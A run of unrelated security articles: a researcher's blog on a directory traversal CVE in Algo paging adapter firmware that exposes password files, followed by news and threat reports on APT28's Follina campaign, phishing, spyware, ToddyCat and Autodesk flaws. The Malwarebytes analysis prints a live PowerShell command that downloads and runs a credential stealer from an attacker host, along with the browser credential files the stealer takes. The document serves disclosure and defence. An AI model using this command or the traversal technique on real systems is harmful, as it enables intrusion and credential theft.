Algo Communication Products Ltd. 8373 IP Zone Paging Adapter Firmware 1.7.6 allows attackers to perform a directory traversal via a web request sent to /fm-data.lua.

Hey All,

Been awhile, like usual :)

We will be talking about a CVE related to firmware running on one of these devices in this blog. Other devices by Algo running identical firmware seem impacted as well.

I am here today to write about a vulnerability I recently discovered during a security assessment and how it spawned into my first CVE. Getting a CVE to my name is something I’ve wanted to accomplish for several years. I got close a few times, and once I even found what I thought was a “Zero day” in a Fortinet Firewall just to find out it was reported and patched just weeks before I found it. So close!

While I will be transparent in saying that this vulnerability is far from the most mind blowing or exciting vulnerability in recent times. I will also say I’m proud to have reported it through the CVE reporting process and was reserved CVE-2022–31395 by doing so. The final step in locking the CVE in is to point MITRE to a publication about the vulnerability. As you can maybe imagine, that is a large part of why I am writing this article. I did attempt to contact the manufacture to ask if they knew about this vulnerability. They simply told me the firmware in question was outdated and to update it. That however didn’t tell me if this was a known vulnerability so I asked if they had any specific CVE’s known to exist against the outdated firmware version I was working with. They said they did not have that information so I moved on to reporting to MITRE. As I sent the details to MITRE I was like:

I just want a CVE with my name on it!!!

I didn’t hear anything for several days from MITRE so I pinged them for an updated and was told they are experiencing a high volume of reported CVE’s and are working through them in a priority order. A few weeks passed and finally I saw a glorious email arrive. It stated that I should use CVE-2022–31395 to craft a public reference for the vulnerability in question, at which point the CVE should be official and no longer just “reserved”.

Without further ado… I present to you the Directory Traversal vulnerability I found and reported. The vulnerability affects at least: **ALGO COMMUNICATION PRODUCTS LTD 8373 IP Zone Paging Adapter Control Panel, Firmware 1.7.6**. Other ALGO products containing the same firmware likely contain the same vulnerability as I have also confirmed the **1.7.6 Firmware on Algos’ “8201 SIP PoE Intercom Control Panel”** contains the same vulnerability). I have not yet confirmed if other, newer firmwares are vulnerable at this time. In addition, the support team at Algo said the best way to know would be to update to their newest firmware and try the attack again. However, I do not have administrative privileges to this device as it belongs to a client of mine, so I am not able to update it and will have to wait if to see if my client decides to do so. I will report back if I find that newer versions are impacted.

Lets’ get into some of the details about this vulnerability! First, it is worth noting that this is an authenticated attack. The part of the application that is vulnerable is only accessible once authenticated. These devices appear to come pre-configured with a default password of “algo” with no username. In fact, I am saved a Google search for default password when initially analyzing the interface as it’s clearly stated right in the web interface itself.

I know it’s not a secret… but it feels like a bad idea to have the default password printed next to the login feature.

Lucky for me, the device I was analyzing still had its’ default password configured so I was able to access administrative functions of this IP Zone Paging Adapter. A function that quickly stood out to me was called “File Manager” which for obvious reasons (to people in offensive security) is immediately a place I start to analyze deeper as a pentester and bug hunter.

My first move, is to attempt to download any of the files I am presented with here and to see what that HTTP request looks like using BurpSuite Professional… P.S. if you don’t use BurpSuite Pro…. well I am just sad to hear that, it’s an incredibly valuable tool and is priced super well in the lower hundreds per year ($300–400ish if I’m remembering correctly). Anyways… this is what I saw when reviewing the download request.

In this example, I’m downloading the “user.conf” file.

A natural change to attempt to make before resubmitting the request is, of course, to replace the file in the HTTP request that we want to fetch from the server with a directory traversal payload to see if we can “break out” of the file directory the application intends for us to browse and reach the “_passwd_” file in the “_/etc/_” directory of the underlying Linux OS.

Yehaw!

I was thrilled to see the output of the _passwd_ file! Next, I thought to also grab the “_shadow_” file in the same directory (/_etc/_) which should contain hashed passwords for users! It is possible for us to maybe even crack the hash(es) if we can get them from the file.

Well, this is certainly awesome. I have the hashed password for the _root_ account. This means I can possibly “jailbreak” or “root” the device if I can accomplish two things.

1.  Crack the root password with Hashcat (my preferred hash cracking tool) or another password-hash cracking tool.
2.  Find a way to execute code as root. My two theories on how to accomplish this was either to find a way to enable SSH (since it doesn’t seem to be enabled on my target at least), or to leverage the directory traversal vulnerability while UPLOADING (instead of downloading as seen above). Perhaps I could drop a web shell or drop/overwrite a config file to get me further access.

I like Hashtcat for the GPU acceleration and the “Rules” engine that modifies a given wordlist on the fly! One or two of my first blog posts on https://n0ur5blog.wordpress.com/ (my old blog) talked a whole bunch about Hashcat!

Boom — Hash cracked! Now that I see the clear-text password for the root account, I notice it matches the default password we used to log in to the web interface. I wonder if the web interface just uses whatever the root password is set to, and if changing the web interface password would change the root password. Regardless, I now have one last challenge and that is to turn this into some form of code execution via the methods I mentioned above!

As of the time of this writing I have not successfully executed code as the root user, but have confirmed I can upload files to outside the web root directory and even overwrite files already in place on the system! I am left with the following items to continue my research on this vulnerability.

*   What other hardware and/or firmware versions are vulnerable to this? I have come across some other Algo devices containing default passwords for log-in that didn’t even have the “File Manager” feature. The few I came across did have much newer firmware but also were different hardware from those that I’ve confirmed vulnerable so far. So I assume “File Manager” was either removed in newer firmware versions OR some hardware they produce simply doesn’t have or need the File Manager.
*   How can I use unrestricted file upload, combined with directory traversal to enable SSH or achieve some other form of remote code execution via ROOT. The web server seems serve “lua” files, so I assume if I can figure out the file structure/location of the web server root directory, I could possibly drop a web shell on it that would enable the remote code execution I’m looking for via web browser.
*   Testing if changing the web interface password also changes the root password by grabbing the shadow file again after changing the password to see if the hash changed. If not, we can assume a large number of Algo devices ship with the root password of “_algo_”.
*   Create a python or bash script for this exploit once I discover the full extent of the items above!

Well folks, that is all for now! Hopefully my next blog post is about another CVE I get, but if not I’m sure whatever it is will be something fun and interesting! Hope this was a fun read!

Cheers!

N0ur5

CVE-2022-31395: Achievement Unlocked: CVE-2022–31395 - N0ur5 - Medium

The APT is pairing a known Microsoft flaw with a malicious document to load malware that nabs credentials from Chrome, Firefox and Edge browsers.

The APT is pairing a known Microsoft flaw with a malicious document to load malware that nabs credentials from Chrome, Firefox and Edge browsers.

Advanced persistent threat group Fancy Bear is behind a phishing campaign that uses the specter of nuclear war to exploit a known one-click Microsoft flaw. The goal is to deliver malware that can steal credentials from the Chrome, Firefox and Edge browsers.

The attacks by the Russia-linked APT are tied the Russian and Ukraine war, according to researchers at Malwarebytes Threat Intelligence. They report that Fancy Bear is pushing malicious documents weaponized with the exploit for Follina (CVE-2022-30190), a known Microsoft one-click flaw, according to a blog post published this week.

“This is the first time we’ve observed APT28 using Follina in its operations,” researchers wrote in the post. Fancy Bear is also known as APT28, Strontium and Sofacy.

On June 20, Malwarebytes researchers first observed the weaponized document, which downloads and executes a .Net stealer first reported by Google. Google’s Threat Analysis Group (TAG) said Fancy Bear already has used this stealer to target users in the Ukraine.

The Computer Emergency Response Team of Ukraine (CERT-UA) also independently discovered the malicious document used by Fancy Bear in the recent phishing campaign, according to Malwarebytes.

****Bear on the Loose****

CERT-UA previously identified Fancy Bear as one of the numerous APTs pummeling Ukraine with cyber-attacks in parallel with the invasion by Russian troops that began in late February. The group is believed to be operating on the behest of Russian intelligence to gather info that would be useful to the agency.

In the past Fancy Bear has been linked in attacks targeting elections in the United States and Europe, as well as hacks against sporting and anti-doping agencies related to the 2020 Olympic Games.

Researchers first flagged Follina in April, but only in May was it officially identified as a zero-day, one-click exploit. Follina is associated with the Microsoft Support Diagnostic Tool (MSDT) and uses the ms-msdt protocol to load malicious code from Word or other Office documents when they’re opened.

The bug is dangerous for a number of reasons–not the least of which is its wide attack surface, as it basically affects anyone using Microsoft Office on all currently supported versions of Windows. If successfully exploited, attackers can gain user rights to effectively take over a system and install programs, view, change or delete data, or create new accounts.

Microsoft recently patched Follina in its June Patch Tuesday release but it remains under active exploit by threat actors, including known APTs.

**Threat of Nuclear Attack**

Fancy Bear’s Follina campaign targets users with emails carrying a malicious RTF file called “Nuclear Terrorism A Very Real Threat” in an attempt to prey on victims’ fears that the invasion of Ukraine will escalate into a nuclear conflict, researchers said in the post. The content of the document is an article from the international affairs group Atlantic Council that explores the possibility that Putin will use nuclear weapons in the war in Ukraine.

The malicious file uses a remote template embedded in the Document.xml.rels file to retrieve a remote HTML file from the URL http://kitten-268\[.\]frge\[.\]io/article\[.\]html. The HTML file then uses a JavaScript call to window.location.href to load and execute an encoded PowerShell script using the ms-msdt MSProtocol URI scheme, researchers said.

The PowerShell loads the final payload–a variant of the .Net stealer previously identified by Google in other Fancy Bear campaigns in the Ukraine. While the oldest variant of the stealer used a fake error message pop-up to distract users from what it was doing, the variant used in the nuclear-themed campaign does not, researchers said.

In other functionality, the recently seen variant is “almost identical” to the earlier one, “with just a few minor refactors and some additional sleep commands,” they added.

As with the previous variant, the stealer’s main pupose is to steal data—including website credentials such as username, password and URL–from several popular browsers, including Google Chrome, Microsoft Edge and Firefox. The malware then uses the IMAP email protocol to exfiltrate data to its command-and-control server in the same way the earlier variant did but this time to a different domain, researchers said.

“The old variant of this stealer connected to mail\[.\]sartoc.com (144.208.77.68) to exfiltrate data,” they wrote. “The new variant uses the same method but a different domain, www.specialityllc\[.\]com. Interestingly both are located in Dubai.”

The owners of the websites most likely have nothing to do with APT28, with the group simply taking advantage of abandoned or vulnerable sites, researchers added.

Fancy Bear Uses Nuke Threat Lure to Exploit 1-Click Bug

The credential-phishing attack leverages social engineering and brand impersonation techniques to lead users to a spoofed MetaMask verification page.

Researchers have uncovered an email-based credential-phishing attack targeting users of MetaMask, a cryptocurrency wallet used to interact with the Ethereum blockchain.

The campaign is directed at Microsoft 365 (formerly Microsoft Office 365) users and has targeted multiple organizations across the financial industry. It starts with a socially engineered email that looks like a MetaMask verification email, according to the Armorblox research team, containing a link.

Upon clicking the link, users are taken to a spoofed MetaMask verification page, where they are asked to verify their wallet, claiming that non-compliance would result in limited access to their wallets.

The fake landing page uses MetaMask logos and branding to closely resemble the real log-in page, and it deploys a language of urgency to encourage compliance with the Know Your Customer (KYC) verification request.

"In order to get the victim to comply with the request and exfiltrate sensitive data, attackers included language within both the body of the email and the fake landing page that denoted a sense of urgency, making it known that time was of the essence," the Armorblox post notes.

The research team also pointed out that the attack leverages the curiosity effect, a cognitive bias that can be used to exploit the user's inherent urge to resolve doubt.

"Each further engagement through the attack flow further aimed to increase this trust through legitimate logo inclusions, branding, and key attributes that are only affiliated with the spoofed brand," the post continues.

**Attack Skates Past Microsoft Security**

Even though the email came from an invalid domain, the attackers were still able to slip through Microsoft's security controls, using a "gamut of techniques" to bypass secure email gateway (SEG) filters.

Armorblox CSO Brian Johnson notes while the company's research team does not have access to Microsoft threat detection details, they have seen a large amount of modern attacks spawn zero-day malicious links that are ephemeral in nature.

"With the advent of cloud services, it is easy to spin up and spin down malicious links in minutes," he explains. "These attacks can only be detected when you combine natural language understanding with artificial intelligence to go beyond static checks on known malicious links."

To protect against these types of attacks, Johnson says the basic steps include ensuring multifactor authentication (MFA) across all the organization's accounts — specifically, the ones that provide access to financial accounts.

The Armorblox post also recommends keeping an eye out for social-engineering cues, for example any logical inconsistencies within the email, and to augment native email security with additional controls.

**Cryptocurrency Attacks Evolving, Targeting Startups**

Johnson adds that crypto-wallet phishing has become more targeted and mainstream.

"As the use of cryptocurrency gains traction in both personal and business environments, it opens up another vector for malicious actors," Johnson warns.

Hackers' approaches to compromising cryptocurrency and digital asset exchanges continue to evolve, as a series of attacks against small and midsize businesses has led to major cryptocurrency losses for the victims.

Among these malicious actors is BlueNoroff, an advanced persistent threat (APT) group that's part of the larger Lazarus Group associated with North Korea, which carried out the SnatchCrypto campaign in January.

Meanwhile, cryptocurrency mixing — a technique that uses pools of cryptocurrency to complicate the tracking of electronic transactions — is set to grow, as ransomware and other cybercriminal enterprises increasingly lean into cryptocurrency, a November 2021 report from Intel 471 warned.

MetaMask Crypto-Wallet Theft Skates Past Microsoft 365 Security

The beleaguered Israeli surveillanceware vendor NSO Group this week admitted to the European Union lawmakers that its Pegasus tool was used by at least five countries in the region.
"We're trying to do the right thing and that's more than other companies working in the industry," Chaim Gelfand, the company's general counsel and chief compliance officer, said, according to a report from Politico.

The beleaguered Israeli surveillanceware vendor NSO Group this week admitted to the European Union lawmakers that its Pegasus tool was used by at least five countries in the region.

"We're trying to do the right thing and that's more than other companies working in the industry," Chaim Gelfand, the company's general counsel and chief compliance officer, said, according to a report from Politico.

Acknowledging that it had "made mistakes," the company also stressed on the need for an international standard to regulate the government use of spyware.

The disclosure comes as a special inquiry committee was launched in April 2022 to investigate alleged breaches of E.U. law following revelations that the company's Pegasus spyware is being used to snoop on phones belonging to politicians, diplomats, and civil society members.

"The committee is going to look into existing national laws regulating surveillance, and whether Pegasus spyware was used for political purposes against, for example, journalists, politicians and lawyers," the European Parliament said in March 2022.

Earlier this February, the European Data Protection Supervisor (EDPS) called for a ban on the development and the use of commercial spyware in the region, stating that the technology's "unprecedented level of intrusiveness" could endanger users' right to privacy.

Pegasus, and its other counterparts like FinFisher and Cytrox, are designed to be stealthily installed on a smartphone by exploiting unknown vulnerabilities in software known as zero-days to seize remote control of the device and harvest sensitive data.

Infections are typically achieved by means of one-click attacks wherein targets are tricked into clicking on a link sent via messages on iMessage or WhatsApp, or alternatively using zero-click exploits that require no interaction.

Once installed, the spyware provides support for a broad range of capabilities that allows the operator to track the victim's whereabouts, eavesdrop on conversations, and exfiltrate messages from even encrypted apps like WhatsApp.

NSO Group, founded in 2010, has long maintained it only supplies the software to government customers for what it says is to tackle terrorism, drug trafficking, and serious crime, but evidence has shown widespread misuse of the software to keep tabs on political opponents, critics, activists, journalists, lawyers across the world.

"The use of Pegasus does not require cooperation with telecommunication companies, and it can easily overcome encryption, SSL, proprietary protocols, and any hurdle introduced by the complex communications worldwide," the Council of Europe noted in an interim report.

"It provides remote, covert, and unlimited access to the target's mobile devices. This Modus Operandi of the Pegasus clearly reveals its capacity to be used for targeted as well as indiscriminate surveillance."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

NSO Confirms Pegasus Spyware Used by at least 5 European Countries

Researchers have spotted the threat group, also known as Fancy Bear and Sofacy, using the Windows MSDT vulnerability to distribute information stealers to users in Ukraine.

Russia’s notorious advanced persistent threat group APT28 is the latest in a growing number of attackers trying to exploit the “Follina” vulnerability in the Microsoft Support Diagnostic Tool (MSDT) in Windows.

Researchers from Malwarebytes this week observed the threat actor — aka Fancy Bear and Sofacy — sending out a malicious document with an exploit for the now-patched flaw (CVE-2022-30190) via phishing emails to users in Ukraine. The document was titled “Nuclear Terrorism A Very Real Threat.rtf" and appeared designed to prey on fears about the war in Ukraine spiraling into a nuclear holocaust. 

Malwarebytes identified the contents of the document as a May 10 article from the Atlantic Council on the potential for Russian President Vladimir Putin to use nuclear weapons in Ukraine.

Users who opened the document ended up having a new version of a previously known .Net credential stealer loaded on their systems via the Follina exploit, which made headlines as a zero-day earlier this month. The malware is designed to steal usernames, passwords, and URLs from Chrome and Microsoft Edge browsers. It can also grab all stored cookies in Chrome, Malwarebytes researchers say.

Ukraine’s Computer Emergency Response Team (CERT-UA) separately warned of the same threat. In an advisory, it said it had spotted APT28 using the same malicious document that Malwarebytes reported to try and distribute the CredoMap credential-stealing malware to users in Ukraine. 

Available telemetry suggests that the adversary has been using the document since at least June 10, CERT-UA says.

“The target, and the involvement of APT28, (a division of Russian military intelligence), suggests that campaign is a part of the conflict in Ukraine, or at the very least linked to the foreign policy and military objectives of the Russian state,” states Malwarebytes in a report Tuesday on the new activity.

**The Follina Feeding Frenzy**

The Follina bug in MSDT exists in all current versions of Windows and can be exploited via malicious Microsoft Office documents. To trigger it, all an attacker needs to do is call MSDT from an Office app, such as Word, using the URL protocol. Attackers can exploit the flaw to gain remote control of vulnerable systems and take a variety of malicious actions on them, including executing malicious code, installing programs, modifying data, and creating new accounts. 

Microsoft disclosed the flaw in late May amid widespread zero-day exploit activity. The company finally issued a fix for the vulnerability in its Patch Tuesday set of monthly security updates for June.

Malwarebytes describes the Ukrainian campaign as the first time it had observed APT28 exploiting Follina. But numerous other groups, including other state-backed actors, have been actively exploiting the vulnerability in recent weeks.

Many of the attacks have targeted Ukrainian entities. Earlier this month, for instance, CERT-UA warned about a threat actor — likely Russia’s Sandworm APT group — using a Follina exploit in a “massive cyberattack” targeting media organizations in Ukraine. 

And just this week, CERT-UA warned about a threat group it is tracking as UAC-0098, which is targeting critical infrastructure facilities in Ukraine with a tax-themed document carrying a Follina exploit. According to the CERT-UA, the attackers in this campaign are exploiting Follina to drop the Cobalt Strike Beacon post-compromise attack tool on compromised systems.

Other reports of Follina-related activity have emerged as well, suggesting the flaw is of high interest to attackers and needs to be addressed quickly. Earlier this month, Proofpoint reported that it had blocked a likely stated-backed phishing campaign involving a Follina exploit that targeted a handful of its customers. The phishing email masqueraded as a document about a salary increase, which if opened would have resulted in a PowerShell script being downloaded to the system.

Symantec, too, has reported observing a variety of threat actors exploiting Follina to distribute different malicious payloads, including the AsyncRAT remote access Trojan and another unnamed malware for stealing cookies and save login data from browsers such as Chrome, Edge and Firefox.

Russia's APT28 Launches Nuke-Themed Follina Exploit Campaign

ToddyCat's Samurai and Ninja tools are designed to give attackers persistent and deep access on compromised networks, security vendor says.

A threat group that may have been among the first to exploit the ProxyLogon zero-day vulnerability in Exchange Servers last year is using a pair of dangerous and previously unseen malware tools in a cyber espionage campaign targeting military and government organizations in Europe and Asia.

Researchers at Kaspersky who first detected the group's activities this week described the tools as malware designed to enable long-term persistence on an organization's public-facing Web servers and giving attackers the ability to move laterally and penetrate deeply into compromised networks.

The malware tools have features that allow their functionality to be extended at will, but Kaspersky has been unable so far to determine the full range of their capabilities, the vendor noted.

**Attacks Targeted ProxyLogon Exchange Server Flaw**

Kaspersky is tracking the previously unknown group as "ToddyCat." In a report this week, the security vendor said the adversary's victim targeting and certain operational overlaps with at least one known Chinese threat actor suggest that members of ToddyCat are Chinese-speaking as well.

"This group targets high-profile organizations, usually government, diplomatic, military organizations, and military contractors," says Giampaolo Dedola, security researcher at Kaspersky. It may be possible that the threat actor has compromised victims in the US as well. But currently Kaspersky has no information to suggest this is indeed the case, Dedola says.

Kaspersky's analysis showed that ToddyCat's campaign began in December 2020 with attacks targeting selected Exchange Servers belonging to three organizations in Vietnam and Taiwan. The attackers used an unknown exploit to breach the Exchange Servers and deploy the popular China Chopper Web shell on the systems. They then used the Web shell to initiate a multi-stage infection chain involving custom loaders that ended with one of the new malware tools — a backdoor called "Samurai" — being deployed on the compromised system.

**Sophisticated Malware**

Samurai is a passive backdoor designed to give the attackers persistent access on Internet-facing Web servers. The backdoor works on ports 80 and 443 and is designed primarily to execute arbitrary C# code on infected systems.

"Based on our investigation, we were able to detect some of the source codes uploaded by the attacker and we know that it was used to execute arbitrary commands, download files, forward TCP packets to internal hosts," Dedola says. As one example, he points to the attacker using Samurai to communicate with internal Active Directory servers. "The ability to run arbitrary C# code allows attackers to infinitely extend the malware's capabilities," he says.

Kaspersky's research showed the attackers also used Samurai to launch "Ninja," the other previously unseen malware tool that ToddyCat is using in its attacks. Ninja is Cobalt Strike-like malware for executing post-exploitation activities on already compromised systems.

"It allows the attackers to control the remote system, manipulate the file system, manipulate processes, inject arbitrary code in other processes, forward TCP packets, and load new modules in its memory," Dedola says.

Ninja agents can be configured to act like servers. So, the adversary can use the malware to designate specific machines as internal command and control servers (C2s), thereby limiting connections to external servers and reducing the chances of being detected. This feature, combined with the TCP command forwarding functionality, gives the attackers a way to manage even those systems that are not directly connected to the Internet, Dedola says.

Between Dec. 2020 and early Feb. 2021, ToddyCat remained tightly focused on a handful of organizations in Vietnam and Taiwan. But then, for a brief period between late February and early March, the threat actor quickly escalated its attacks by targeting the ProxyLogon vulnerability to compromise organizations in multiple countries. The group's victims included organizations in Russia, UK, Slovakia, India, Iran, and Malaysia, and belonged to industries and sectors that have traditionally been of interest to China-based groups, Kaspersky said.

**A Change in Tactics**

Almost all of ToddyCat's early attacks targeted Exchange Server flaws. But starting Sept. 2021, Kaspersky observed what it described as "waves of attacks" against desktop systems involving the use of malicious loaders sent via the Telegram messaging service. It's unclear how many organizations ToddyCat has compromised, but the number is likely less than 30, Dedola says.

What makes Samurai and Ninja dangerous is the anti-forensic and anti-analysis technique incorporated into the malware, according to Kaspersky. For example. Samurai is designed to share TCP port 80 and 443 with Microsoft Exchange and cannot be detected by monitoring the ports. The malware also uses a complex loading scheme to avoid detection and maintain persistence. It addition, it uses a technique called "control-code flattening" to avoid detection by static analysis tools, Dedola says.

"The Ninja Trojan is also another modular malware, with capabilities that can be easily extended by the attacker," he tells Dark Reading, adding that the malware runs only in memory and never appears on file systems, making it harder to detect. "It is usually executed with a loader, which decrypts the payload from a third file. The file with the encrypted payload is immediately deleted by the loader."

Christopher Prewitt, CTO at Inversion6, says Kaspersky's research shows that the malware authors have gone to great lengths to hide and obfuscate their methods. While the Samurai backdoor features some relatively common features, ToddyCat's bespoke Ninja post-exploit tool appears more interesting.

"It is loaded in memory, making it much more difficult to analyze and detect," Prewitt says. "The threat actor could continue to reuse this part of their toolkit, while only swapping out or updating the initial infection point and backdoor tooling."

China-Linked ToddyCat APT Pioneers Novel Spyware

Threat actors associated with Russian intelligence are using the fear or nuclear war to spread data-stealing malware in Ukraine.
The post Russia’s APT28 uses fear of nuclear war to spread Follina docs in Ukraine appeared first on Malwarebytes Labs.

_This blog post was authored by Hossein Jazi and Roberto Santos_.

In a recent campaign, APT28, an advanced persistent threat actor linked with Russian intelligence, set its sights on Ukraine, targeting users with malware that steals credentials stored in browsers.

APT28 (also known as Sofacy and Fancy Bear) is a notorious Russian threat actor that has been active since at least 2004 with its main activity being collecting intelligence for the Russian government. The group is known to have targeted US politicians, and US organizations, including US nuclear facilities.

On June 20, 2022, Malwarebytes Threat Intelligence identified a document that had been weaponized with the Follina (CVE-2022-30190) exploit to download and execute a new .Net stealer first reported by Google. The discovery was also made independently by CERT-UA.

Follina is a recently-discovered zero-day exploit that uses the ms-msdt protocol to load malicious code from Word documents when they are opened. This is the first time we’ve observed APT28 using Follina in its operations.

**The malicious document**

The maldoc’s filename, Nuclear Terrorism A Very Real Threat.rtf, attempts to get victims to open it by preying on their fears that the invasion of Ukraine will escalate into a nuclear conflict.

The content of the document is an article from the Atlantic Council called “_Will Putin use nuclear weapons in Ukraine? Our experts answer three burning questions_” published on May 10 this year.

The lure asks “Will Putin use nuclear weapons in Ukraine?”

The maldoc is an RTF file compiled on June 10, which suggests that the attack was used around the same time. It uses a remote template embedded in the Document.xml.rels file to retrieve a remote HTML file from the URL http://kitten-268.frge.io/article.html.

The malicious HTML document

The HTML file uses a JavaScript call to window.location.href to load and execute an encoded PowerShell script using the ms-msdt MSProtocol URI scheme. The decoded script uses cmd to run PowerShell code that downloads and executes the final payload:

    "C:\WINDOWS\system32\cmd.exe" /k powershell -NonInteractive -WindowStyle Hidden -NoProfile -command "& {iwr http://kompartpomiar.pl/grafika/SQLite.Interop.dll -OutFile "C:\Users\$ENV:UserName\SQLite.Interop.dll";iwr http://kompartpomiar.pl/grafika/docx.exe -OutFile "C:\Users\$ENV:UserName\docx.exe";Start-Process "C:\Users\$ENV:UserName\docx.exe"}"

**Payload Analysis**

The final payload is a variant of a stealer APT28 has used against targets in Ukraine before. In the oldest variant, the stealer used a fake error message to hide what it was doing (A secondary thread was displaying this error message while the main program continued executing.) The new variant does not show the popup.

In older versions of the stealer, a fake error message distracted users

The variant used in this attack is almost identical to the one reported by Google, with just a few minor refactors and some additional sleep commands.

A side-by-side comparison of two versions of the APT28 stealer

As with the previous variant, the stealer’s main pupose is to steal data from several popular browsers.

**Google Chrome and Microsoft Edge**

The malware steals any website credentials (username, password, and url) users have saved in the browser by reading the contents of %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data.

Debugging session showing how attackers are capable of stealing credentials

In a very similar way, the new variant also grabs all the saved cookies stored in Google Chrome by accessing %LOCALAPPDATA%\Google\Chrome\User Data\Default\Network\Cookies.

Cookie stealing code (Google Chrome)

Stolen cookies can sometimes be used to break into websites even if the username and password aren’t saved to the browser.

The code to steal cookies and passwords from the Chromium-based Edge browser is almost identical to the code used for Chrome.

**Firefox**

This malware can also steal data from Firefox. It does this by iterating through every profile looking for the cookies.sqlite file that stores the cookies for each user.

Sysmon capturing access to cookies.sqlite file

In the case of passwords, the attackers attempt to steal logins.json, key3.db, key4.db, cert8.db, cert9.db, signons.sqlite.

Attackers will grab also passwords from Firefox

These files are necessary for recovering elements like saved passwords and certificates. Old versions are also supported (signons.sqlite, key3.db and cert8.db are no longer used by new Firefox versions). Note that if the user has set a master password, the attackers will likely attempt to crack this password offline, later, to recover these credentials.

**Exfiltrating data**

The malware uses the IMAP email protocol to exfiltrate data to its command and control (C2) server.

The IMAP login event

The old variant of this stealer connected to mail\[.\]sartoc.com (144.208.77.68) to exfiltrate data. The new variant uses the same method but a different domain, www.specialityllc\[.\]com. Interestingly both are located in Dubai.

It’s likely the owners of the C2 websites have nothing to do with APT28, and the group simply took advantage of abandoned or vulnerable sites.

Although ransacking browsers might look like petty theft, passwords are the key to accessing sensitive information and intelligence. The target, and the involvement of APT28, a division of Russian military intelligence), suggests that campaign is a part of the conflict in Ukraine, or at the very least linked to the foreign policy and military objectives of the Russian state. Ukraine continues to be a battleground for cyberattacks and espionage, as well as devastating kinetic warfare and humanitarian abuses.

For more coverage of threat actors active in the Ukraine conflict, read our recent article about the efforts of an unknown APT group that has targeted Russia repeatedly since Ukraine invasion.

**Protection**

Malwarebytes customers were proactively protected against this campaign thanks to our anti-exploit protection.

**IOCs**

**Maldoc:  
**Nuclear Terrorism A Very Real Threat.rtf  
daaa271cee97853bf4e235b55cb34c1f03ea6f8d3c958f86728d41f418b0bf01

**Remote template (Follina):  
**http://kitten-268.frge\[.\]io/article.html

**Stealer:  
**http://kompartpomiar\[.\]pl/grafika/docx.exe  
2318ae5d7c23bf186b88abecf892e23ce199381b22c8eb216ad1616ee8877933

**C2:  
**www.specialityllc\[.\]com

Russia’s APT28 uses fear of nuclear war to spread Follina docs in Ukraine

A maliciously crafted CAT file in Autodesk AutoCAD 2023 can be used to trigger use-after-free vulnerability. Exploitation of this vulnerability may lead to code execution.

**Summary**

Multiple Autodesk products have been affected by Use After Free, Out-of-bound-write, Stack-based Buffer, Memory Corruption, and Buffer Overflow vulnerabilities.

**Description**

The details of the vulnerabilities are as follows:

1) CVE-2022-25789 - A maliciously crafted DWF, 3DS and DWFX files in Autodesk AutoCAD 2022, 2021, 2020, 2019 can be used to trigger use-after-free vulnerability. Exploitation of this vulnerability may lead to code execution.

2) CVE-2022-25790 - A maliciously crafted DWF file in Autodesk AutoCAD 2022, 2021, 2020, 2019 and Autodesk Navisworks 2022, 2020, and 2019 can be used to write beyond the allocated boundaries when parsing the DWF files. Exploitation of this vulnerability may lead to code execution.

3) CVE-2022-25791 - A Memory Corruption vulnerability for DWF and DWFX files in Autodesk AutoCAD 2022, 2021, 2020, 2019 and Autodesk Navisworks 2022, 2020, and 2019 may lead to code execution through maliciously crafted DLL files.

4) CVE-2022-25792 - A maliciously crafted DXF file in Autodesk AutoCAD 2022, 2021, 2020, 2019 and Autodesk Navisworks 2022 can be used to write beyond the allocated buffer through Buffer overflow vulnerability. This vulnerability can be exploited to execute arbitrary code.

5) CVE-2022-25796 - A Double Free vulnerability allows remote malicious actors to execute arbitrary code on DWF file in Autodesk Navisworks 2022 within affected installations. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

6) CVE-2022-27528 - A maliciously crafted DWFX and SKP files in Autodesk Navisworks 2022, 2020, and 2019 can be used to trigger use-after-free vulnerability. Exploitation of this vulnerability may lead to code execution

7) CVE-2022-27868 - A maliciously crafted CAT file in Autodesk AutoCAD 2023 can be used to trigger use-after-free vulnerability. Exploitation of this vulnerability may lead to code execution.

**Affected Products**

**Item**

**Impacted Versions**

**Mitigated Versions**

**Update Source**

Autodesk® Navisworks®

2022, 2020, 2019

2022.2, 2020.5, 2019.7

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® Architecture

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® Electrical

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® Map 3D

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® Mechanical

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® MEP

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® Plant 3D

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® LT

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® Mac

2022

2022.2.2

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® Mac LT

2022

2022.2.2

Autodesk Desktop App, or Accounts Portal

Autodesk® Civil 3D®

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® Advance Steel

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

_\*Note: Product list table contents subject to change._

